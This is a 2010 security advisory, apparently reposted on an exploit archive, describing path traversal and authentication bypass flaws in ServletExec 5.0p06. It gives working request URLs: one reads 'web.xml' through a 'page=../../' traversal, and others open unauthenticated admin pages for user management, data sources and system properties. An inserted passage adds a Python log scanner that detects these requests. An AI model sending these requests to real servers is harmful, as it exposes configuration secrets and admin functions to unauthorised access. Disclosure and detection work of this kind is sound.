Servlet Exec 5.0p06 File Retrieval

Posted Aug 13, 2010
Authored by Stefano Di Paola, Giorgio Fedon | Site mindedsecurity.com

New Atlanta Servlet Exec allows for the reading of system configuration files and unauthorized access to system information.

tags | exploit
SHA-256 | 34a4088e3ba49cb55c3d0a4c393f545d9987745e1a0af51a84ec49da7a867e1f

Minded Security Labs: Advisory #MSA260209
Servlet Exec Multiple Security Issues

Tested Versions:
Servlet Exec 5.0p06 on Microsoft IIS 6.0


Minded Security ReferenceID:
MSA260209


Credits:
Discovery by
Stefano Di Paola and Giorgio Fedon of Minded Security
Stefano Di Paola stefano.dipaola [_at_] mindedsecurity.com discovered the
first issue (Path Traversal) and
Giorgio Fedon giorgio.fedon [_at_] mindedsecurity.com discovered the second
issue (Authentication Bypass)


Severity:
High: Attackers may be able to read application secrets stored in configuration
files or to bypass authentication on the Servlet Exec administrative interface.


Solution:
Update your installation with July 2010 hotfix:
http://www.newatlanta.com/c/products/servletexec/download/hotfix/showHotfixes


Summary

Minded Security consultants discovered during a penetration testing activity that
New Atlanta Servlet Exec may permit reading system configuration files or gaining
access to system information without valid credentials.


Analysis


First Issue: Path Traversal
Minded Security consultants were able to access arbitrary files under the ServletExec
system path by abusing a flaw in the administration help page of the ServletExec platform.
In fact, by requesting the following URL:

http://<webserver>/servlet/pagecompile._admin._help._helpContent_xjsp?
page=../../WEB-INF/web.xml

it is possible to download an application's "web.xml" file.



Second issue: Authentication Bypass
Furthermore, we discovered that some functionalities of the Servlet Exec
Administrative Interface can be accessed without any valid user credentials.
By supplying a properly crafted request to the Servlet interface, it is possible
to gain direct access to precompiled JSP pages stored inside the "Servlet Exec
Admin" package.
The following request will display the login interface:

http://<webserver>/servlet/pagecompile._admin._login_xjsp

It is very important to observe that direct access to "Servlet Exec
Administrative" functionality may lead to a full system compromise if the
attacker is able to deploy his own malicious code on the protected environment.
The following request will show the system properties:

http://<webserver>/servlet/pagecompile._admin._vmSystemProperties_xjsp

Other examples include unauthorized access to the "Log Configuration" panel:

http://<webserver>/servlet/pagecompile._admin._SELogging_xjsp

Unauthorized access to Administrative User Management panel:

http://<webserver>/servlet/pagecompile._admin._userMgt_xjsp

Access to virtual server management:

http://<webserver>/servlet/pagecompile._admin._virtualServers_xjsp

Access to Admin Optional packages configuration section:

http://<webserver>/servlet/pagecompile._admin._optionalPackages_xjsp

Access to Data Sources configuration section:

http://<webserver>/servlet/pagecompile._admin._dataSources_xjsp

Access to Admin Debug configuration section:

http://<webserver>/servlet/pagecompile._admin._debug_xjsp
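Both issues leave the same footprint in web server access logs: a request whose path begins with `/servlet/pagecompile._admin.` (direct access to a precompiled admin JSP, the second issue) and, for the help page, a `page` parameter whose decoded value climbs directories (the first issue). The following script is an added example for defenders, not part of the Minded Security advisory or of ServletExec itself: it parses constructed IIS-style log lines (the seven-field layout and the client addresses are assumptions made for the example) and flags both patterns, decoding the query string so that URL-encoded `%2e%2e%2f` variants are caught as well.

```python
"""Flag ServletExec admin-JSP access and 'page' parameter traversal in access logs.

Added example (not from the advisory). Log format is a constructed, simplified
IIS W3C layout: date time cs-method cs-uri-stem cs-uri-query sc-status c-ip
"""
import re
from urllib.parse import unquote

# Constructed sample log lines for the example; the addresses are made up.
SAMPLE_LOG = """\
2010-08-13 10:00:01 GET /index.html - 200 10.0.0.5
2010-08-13 10:00:02 GET /servlet/pagecompile._admin._help._helpContent_xjsp page=../../WEB-INF/web.xml 200 10.0.0.9
2010-08-13 10:00:03 GET /servlet/pagecompile._admin._vmSystemProperties_xjsp - 200 10.0.0.9
2010-08-13 10:00:04 GET /servlet/pagecompile._admin._help._helpContent_xjsp page=%2e%2e%2f%2e%2e%2fWEB-INF%2fweb.xml 200 10.0.0.9
2010-08-13 10:00:05 GET /servlet/pagecompile._admin._help._helpContent_xjsp page=intro.html 200 10.0.0.7
2010-08-13 10:00:06 GET /servlet/MyAppServlet id=42 200 10.0.0.7
"""

# Direct access to any precompiled JSP of the admin package (second issue).
ADMIN_STEM = re.compile(r"^/servlet/pagecompile\._admin\.", re.IGNORECASE)
# A '..' path segment delimited by slashes or backslashes (first issue).
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded traversal is not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line: str):
    """Split one log line into a record; return None for headers/malformed lines."""
    parts = line.split()
    if len(parts) != 7 or parts[0].startswith("#"):
        return None
    _date, _time, method, stem, query, status, client = parts
    return {
        "method": method,
        "stem": stem,
        "query": "" if query == "-" else query,
        "status": int(status),
        "client": client,
    }


def classify(rec: dict) -> list:
    """Return the list of reasons a request is suspicious (empty if none)."""
    reasons = []
    if ADMIN_STEM.search(rec["stem"]):
        reasons.append("direct access to precompiled admin JSP")
    for param in rec["query"].split("&"):
        if "=" not in param:
            continue
        name, value = param.split("=", 1)
        if TRAVERSAL.search(decode_fully(value)):
            reasons.append(f"path traversal in parameter {name!r}")
    return reasons


def scan_log(text: str) -> list:
    """Scan a whole log; each finding records line number, client, path and reasons."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            findings.append({
                "line": lineno,
                "client": rec["client"],
                "stem": rec["stem"],
                "status": rec["status"],
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']:>3} {f['client']:<10} {f['stem']}")
        for r in f["reasons"]:
            print(f"      - {r}")
```

On the sample input the scanner reports four of the six lines: the two traversal attempts against the help page (one plain, one percent-encoded), the unauthenticated hit on the system-properties page, and a benign-looking help request that still reaches the admin package without a login. A 200 status on any `pagecompile._admin.` stem from a client that never authenticated is the strongest signal; if the help page is legitimately used in your environment, correlate the `helpContent` hits with an existing admin session before alerting on them.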



Disclosure Timeline

26/02/2009 Issue found
29/04/2010 Reported to Vendor


Disclaimer


The information within this paper may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.

In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information.

Any use of this information is at the user's own risk.
Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express
consent of Minded Security Research Lab. If you wish to reprint the
whole or any part of this Alert in any other medium excluding
electronic medium, please e-mail research_at_mindedsecurity.com
for permission.



Copyright (c) 2010 Minded Security, S.r.l.

All rights reserved worldwide.


